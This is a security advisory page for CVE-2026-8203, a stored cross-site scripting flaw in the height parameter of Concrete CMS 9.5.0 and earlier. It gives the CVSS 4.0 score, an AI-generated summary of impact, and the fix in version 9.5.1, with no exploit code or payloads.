VYPR
← All advisories
High severityNVD Advisory· Published May 21, 2026

CVE-2026-8203

CVE-2026-8203

Description

Concrete CMS 9.5.0 and below has Stored XSS on the height parameter. The controller does not validate or sanitize $height. Any user with editor privileges can inject malicious JavaScript that executes in the context of any visitor's browser, potentially leading to session hijacking, credential theft, or other malicious actions. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.3 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Alfin Joseph for reporting.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Concrete CMS ≤9.5.0 has stored XSS in the height parameter, allowing editors to inject JavaScript that can hijack sessions or steal credentials.

Vulnerability

Overview CVE-2026-8203 is a stored cross-site scripting (XSS) vulnerability in Concrete CMS versions 9.5.0 and below. The root cause lies in the controller handling the height parameter, which performs no validation or sanitization of user-supplied input. This allows any user with editor privileges to inject arbitrary JavaScript code that is stored and later executed in the context of visitors' browsers [1].

Attack

Surface and Exploitation The attacker must have editor privileges, but no special network position is required. The vulnerable parameter is processed without sanitization, enabling the injection of malicious scripts directly into the application's output. The CVSS v4.0 score of 7.3 (AV:N/AC:H/AT:P/PR:H/UI:P) reflects the high privileges needed but also the potential for serious impact when combined with social engineering [1].

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in every visitor's browser session. This can lead to session hijacking, theft of credentials, or other malicious actions that compromise user accounts and data [1].

Mitigation

Concrete CMS version 9.5.1 addresses this vulnerability by sanitizing the height parameter. Users are strongly advised to upgrade to 9.5.1 or later. No workaround is documented for older versions [1].

References
  1. 9.5.1 Release Notes

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

1

News mentions

0

No linked articles in our index yet.